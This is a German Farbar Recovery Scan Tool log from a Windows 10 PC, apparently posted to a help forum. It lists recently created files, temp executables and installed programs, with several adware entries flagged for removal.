2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\Druciy
2017-02-12 22:13 - 2017-02-13 19:06 - 00000000 ____D C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Zrshfcit
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\ProgramData\Hayzumflex
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2017-02-12 22:13 - 2017-02-12 22:15 - 07319040 _____ C:\Users\Barbara\AppData\Roaming\agent.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00126464 _____ C:\Users\Barbara\AppData\Roaming\noah.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00070752 _____ C:\Users\Barbara\AppData\Roaming\Config.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00018432 _____ C:\Users\Barbara\AppData\Roaming\Main.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00005568 _____ C:\Users\Barbara\AppData\Roaming\md.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00002398 _____ C:\WINDOWS\SysWOW64\findit.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00000002 _____ C:\END
2017-02-12 22:13 - 2017-02-12 22:14 - 00016224 _____ C:\Users\Barbara\AppData\Roaming\InstallationConfiguration.xml
2017-02-12 22:13 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}
2017-02-12 22:13 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2017-02-12 22:13 - 2017-02-12 22:13 - 01907481 _____ C:\Users\Barbara\AppData\Roaming\Fresh-Tom.tst
2017-02-12 22:13 - 2017-02-12 22:13 - 00983040 _____ C:\Users\Barbara\AppData\Roaming\Fresh-Tom.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 00278520 _____ C:\Users\Barbara\AppData\Roaming\Singleity.bin
2017-02-12 22:13 - 2017-02-12 22:13 - 00140288 _____ C:\Users\Barbara\AppData\Roaming\Installer.dat
2017-02-12 22:13 - 2017-02-12 22:13 - 00016812 _____ C:\WINDOWS\System32\Tasks\108l42A89c7603
2017-02-12 22:13 - 2017-02-12 22:13 - 00006098 _____ C:\WINDOWS\System32\Tasks\Atikationbogot System
2017-02-12 22:13 - 2017-02-12 22:13 - 00003782 _____ C:\WINDOWS\System32\Tasks\Pregehabering
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ___HD C:\ProgramData\108l42A89c7603
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Note-UP
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Qolther
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Ghuversp
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\ProgramData\Hayzumflexs
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\WR5TG73LV7
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\P3ZUK80JKY
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\IQ50062YNB
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Thteckganoied
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Plidaing
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\MyMemory
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\BeCleaner
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Atikationbogot System
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 _____ C:\TOSTACK
2017-02-12 21:59 - 2017-02-12 22:08 - 70965739 _____ (eRightSoft ) C:\Users\Barbara\Downloads\SUPERsetup.exe
2017-02-11 17:30 - 2017-02-11 17:30 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash (1).themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash.themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 08635521 _____ C:\Users\Barbara\Downloads\DreamgardenChristinaManchenko.themepack
2017-02-10 16:16 - 2017-02-10 16:16 - 03287737 _____ C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe
2017-02-10 16:12 - 2017-02-10 16:12 - 00095048 _____ (REMFFW) C:\WINDOWS\system32\Drivers\f200152859a3da102f1abf6a29e00daf.sys
2017-02-09 13:38 - 2017-02-12 20:33 - 00000000 ____D C:\WINDOWS\LastGood
2017-02-09 13:38 - 2017-02-09 13:38 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-02-09 13:38 - 2017-01-04 15:24 - 00222648 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-02-09 13:38 - 2016-12-29 13:43 - 00133056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-02-09 13:38 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-02-09 13:38 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-02-09 10:03 - 2017-02-09 10:03 - 00069400 _____ (Lace514) C:\WINDOWS\system32\Drivers\Lace_wpf_x64.sys
2017-02-03 17:19 - 2017-02-03 17:19 - 00515204 _____ C:\WINDOWS\Minidump\020317-6328-01.dmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
2017-02-03 17:12 - 2017-01-20 19:39 - 00156608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00124352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-02-03 17:12 - 2017-01-20 14:36 - 00001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\elsterformular
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\ProgramData\elsterformular
2017-01-26 18:15 - 2017-01-26 18:15 - 00001302 ____N C:\Users\Public\Desktop\ElsterFormular.lnk
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular Update Service
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular
2017-01-26 18:13 - 2017-01-26 18:15 - 67816592 _____ (Landesfinanzdirektion Thüringen) C:\Users\Barbara\Downloads\ElsterFormularPrivat.exe
2017-01-25 13:39 - 2016-12-21 08:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 13:39 - 2016-12-21 05:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 19:06 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA
2017-02-13 19:05 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-02-12 22:25 - 2016-11-26 12:11 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Mozilla
2017-02-12 22:24 - 2016-09-23 02:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-12 22:24 - 2016-07-16 07:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-12 22:15 - 2016-07-30 11:41 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\NVIDIA
2017-02-12 22:13 - 2016-11-25 17:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-12 22:13 - 2016-07-30 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Witcher 2
2017-02-12 22:13 - 2016-07-30 09:02 - 00002028 ____R C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
2017-02-12 22:12 - 2016-07-30 09:48 - 00000000 ____D C:\Users\Barbara\AppData\Local\Spotify
2017-02-12 21:45 - 2016-09-23 02:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-12 20:33 - 2016-07-30 09:47 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Spotify
2017-02-12 20:33 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-12 09:48 - 2016-07-30 09:24 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrashDumps
2017-02-11 12:51 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 11:44 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-09 13:42 - 2016-09-23 02:41 - 02284542 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-09 13:42 - 2016-07-16 23:51 - 00892132 _____ C:\WINDOWS\system32\perfh007.dat
2017-02-09 13:42 - 2016-07-16 23:51 - 00212864 _____ C:\WINDOWS\system32\perfc007.dat
2017-02-09 13:39 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-02-09 13:39 - 2016-07-30 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-02-09 13:38 - 2016-07-30 09:20 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA Corporation
2017-02-03 17:19 - 2016-11-13 21:39 - 1291434677 _____ C:\WINDOWS\MEMORY.DMP
2017-02-03 17:19 - 2016-11-13 21:39 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-03 17:19 - 2016-09-23 02:41 - 00000000 ____D C:\Users\Barbara
2017-02-03 17:19 - 2016-07-30 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-03 17:18 - 2016-07-30 10:12 - 00000000 ____D C:\ProgramData\Origin
2017-02-03 17:14 - 2016-07-30 09:57 - 00000000 ____D C:\Program Files (x86)\Steam
2017-02-03 17:13 - 2016-07-30 10:16 - 00000000 ____D C:\Users\Barbara\AppData\Local\Origin
2017-02-03 17:12 - 2016-10-13 07:34 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003884 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-07-30 09:19 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA
2017-01-25 13:43 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 11:40 - 2016-12-16 18:33 - 00003284 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-01-21 11:40 - 2016-07-30 08:18 - 00002429 ____N C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-21 11:40 - 2016-07-30 08:18 - 00000000 ___RD C:\Users\Barbara\OneDrive
2017-01-20 19:39 - 2016-10-13 07:34 - 01872320 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01464768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-01-20 19:17 - 2016-11-16 20:05 - 00002457 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-09-02 15:48 - 2016-10-11 12:28 - 0000337 _____ () C:\Users\Barbara\AppData\Roaming\2E7BF6-326E-4870-B5B1-B11758EC2B1D.ini
2017-02-12 22:13 - 2017-02-12 22:15 - 7319040 _____ () C:\Users\Barbara\AppData\Roaming\agent.dat
2017-02-12 22:13 - 2017-02-12 22:14 - 0023622 _____ () C:\Users\Barbara\AppData\Roaming\aliexpress.ico
2017-02-12 22:14 - 2017-02-12 22:14 - 1938537 _____ () C:\Users\Barbara\AppData\Roaming\Bioity.bin
2017-02-12 22:13 - 2017-02-12 22:13 - 0099678 _____ () C:\Users\Barbara\AppData\Roaming\booking.ico
2017-02-12 22:13 - 2017-02-12 22:15 - 0070752 _____ () C:\Users\Barbara\AppData\Roaming\Config.xml
2017-02-12 22:15 - 2017-02-12 22:14 - 0983040 _____ () C:\Users\Barbara\AppData\Roaming\Flex-Fix.exe
2017-02-12 22:15 - 2017-02-12 22:15 - 1907481 _____ () C:\Users\Barbara\AppData\Roaming\Flex-Fix.tst
2017-02-12 22:13 - 2017-02-12 22:13 - 0983040 _____ () C:\Users\Barbara\AppData\Roaming\Fresh-Tom.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 1907481 _____ () C:\Users\Barbara\AppData\Roaming\Fresh-Tom.tst
2017-02-12 22:13 - 2017-02-12 22:14 - 0016224 _____ () C:\Users\Barbara\AppData\Roaming\InstallationConfiguration.xml
2017-02-12 22:13 - 2017-02-12 22:13 - 0140288 _____ () C:\Users\Barbara\AppData\Roaming\Installer.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 0018432 _____ () C:\Users\Barbara\AppData\Roaming\Main.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 0005568 _____ () C:\Users\Barbara\AppData\Roaming\md.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 0126464 _____ () C:\Users\Barbara\AppData\Roaming\noah.dat
2017-02-12 22:13 - 2017-02-12 22:13 - 0278520 _____ () C:\Users\Barbara\AppData\Roaming\Singleity.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 0278520 _____ () C:\Users\Barbara\AppData\Roaming\SonZoolux.bin
2017-02-12 22:15 - 2017-02-12 22:15 - 1938537 _____ () C:\Users\Barbara\AppData\Roaming\Tonex.bin
2017-02-12 22:14 - 2017-02-12 22:15 - 0032038 _____ () C:\Users\Barbara\AppData\Roaming\uninstall_temp.ico
2017-02-12 22:16 - 2017-02-12 22:16 - 0326144 _____ () C:\ProgramData\smp2.exe

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\Program Files (x86)\BeCleaner\BestCleaner.exe
C:\Program Files (x86)\MyMemory\MyMemory.exe
C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
C:\Program Files (x86)\BeCleaner\9J3PGU1187X4TMA.exe
C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
C:\ProgramData\smp2.exe

Einige Dateien in TEMP:
====================
2017-02-12 22:14 - 2017-02-12 22:14 - 1171283 _____ ( ) C:\Users\Barbara\AppData\Local\Temp\4E1F.tmp.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0425674 _____ (WeMonetize ) C:\Users\Barbara\AppData\Local\Temp\EQMVNUA.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 3030016 _____ () C:\Users\Barbara\AppData\Local\Temp\fsdDC2B.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 0257536 _____ () C:\Users\Barbara\AppData\Local\Temp\gA1BE.tmp.exe
2017-02-12 22:14 - 2017-02-12 22:15 - 0248320 _____ () C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0745123 _____ ( ) C:\Users\Barbara\AppData\Local\Temp\global_installer.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0115900 _____ () C:\Users\Barbara\AppData\Local\Temp\load.exe
2016-10-13 07:34 - 2016-09-30 05:25 - 0950328 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetry.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0198200 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI32.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0242232 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI64.dll
2017-02-12 22:13 - 2017-02-12 22:14 - 9753136 _____ () C:\Users\Barbara\AppData\Local\Temp\wajam_install.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-02-09 13:37

==================== Ende von FRST.txt ============================

addition.txt

Zitat:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 19:07:37)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Windows 10 Pro Version 1607 (X64) (2016-09-23 01:45:25)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1500252791-3377746768-789393517-500 - Administrator - Disabled)
Barbara (S-1-5-21-1500252791-3377746768-789393517-1000 - Administrator - Enabled) => C:\Users\Barbara
DefaultAccount (S-1-5-21-1500252791-3377746768-789393517-503 - Limited - Disabled)
Gast (S-1-5-21-1500252791-3377746768-789393517-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1500252791-3377746768-789393517-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Illustrator CS3 (HKLM-x32\...\Adobe_c015d5ef39552390a753ee735d16041) (Version: 13.0 - Adobe Systems Incorporated)
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
AppTrailers - AppTrailers for Desktop (HKLM-x32\...\AppTrailers) (Version: 9.1.10amt - AppTrailers) <==== ACHTUNG
ARCHline 2015 15.0.1.239 (HKLM\...\{526F8F65-6A69-4683-AA88-42BB3321C625}_is1) (Version: - IT-Concept Software GmbH)
BeCleaner version 1.0 (HKLM-x32\...\BeCleaner_is1) (Version: 1.0 - WeMonetize) <==== ACHTUNG
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.0.2.18.20170123 - Landesfinanzdirektion Thüringen)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
Fliqlo Bildschirmschoner (HKLM-x32\...\Fliqlo) (Version: - )
HDWallPaper 1.0 (HKLM-x32\...\HDWallPaper_is1) (Version: 1.0.0.78 - HDWallPaper) <==== ACHTUNG
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
LibreOffice 5.0.6.3 (HKLM-x32\...\{900D9036-4EDA-45EC-A095-E8AFB25D807A}) (Version: 5.0.6.3 - The Document Foundation)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.1.5 - CEWE Stiftung u Co. KGaA)
MFCDLL Shared Library - Retail Version (x32 Version: 6.0.8665.0 - Unknown) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 de)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
MyMemory (HKLM-x32\...\MyMemory) (Version: - MyMemory) <==== ACHTUNG
MyMemory (HKLM-x32\...\MyMemoryPackage) (Version: - ) <==== ACHTUNG
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.3.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.3.0.95 - NVIDIA Corporation)
NVIDIA Grafiktreiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.5.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ACHTUNG
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ACHTUNG
PC Clean Plus (HKLM-x32\...\PC Clean Plus_is1) (Version: 3.6 - pccleanplus.com) <==== ACHTUNG
pccleanplus (HKLM\...\pccleanplus) (Version: 0.4 - pccleanplus) <==== ACHTUNG
PDF Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.87.529.2014 - Realtek)
SafeFinder (HKLM-x32\...\{3FD1E972-E180-4283-B899-77FA9D54F00B}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
SafeFinder (HKLM-x32\...\{6D106813-D0F9-45FC-A4DB-44471E3CB518}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ACHTUNG
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{6ECFED2E-6329-484A-9B08-14ED7F2D65BE}) (Version: 16.1.1449 - Trimble Navigation Limited)
Social2Search (HKLM\...\75c01d6e164de53703a6a972b8072a72) (Version: 11.12.1.334 (i1.0) - Social2Search) <==== ACHTUNG
Spotify (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
System Healer (HKLM-x32\...\SystemHealer) (Version: 4.4.0.3 - SystemHealer) <==== ACHTUNG
The Witcher 2 Enhanced Edition Version 3.0 (HKLM-x32\...\The Witcher 2 Enhanced Edition_is1) (Version: 3.0 - CD Projekt RED)
trotux - Uninstall (HKLM-x32\...\{2CC964FF-0CCA-4C86-8DD0-6D65C37ABE13}) (Version: - ) <==== ACHTUNG
VC User ATL71 RTL X86 --- (x32 Version: 1.0 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
youndoo - Uninstall (HKLM-x32\...\{1554B7C0-A18B-4D6E-B3F3-0F98906018EE}) (Version: - ) <==== ACHTUNG
youndoo - Uninstall (HKLM-x32\...\{1AD282B9-028B-45EA-8EAD-0BA76533C400}) (Version: - ) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

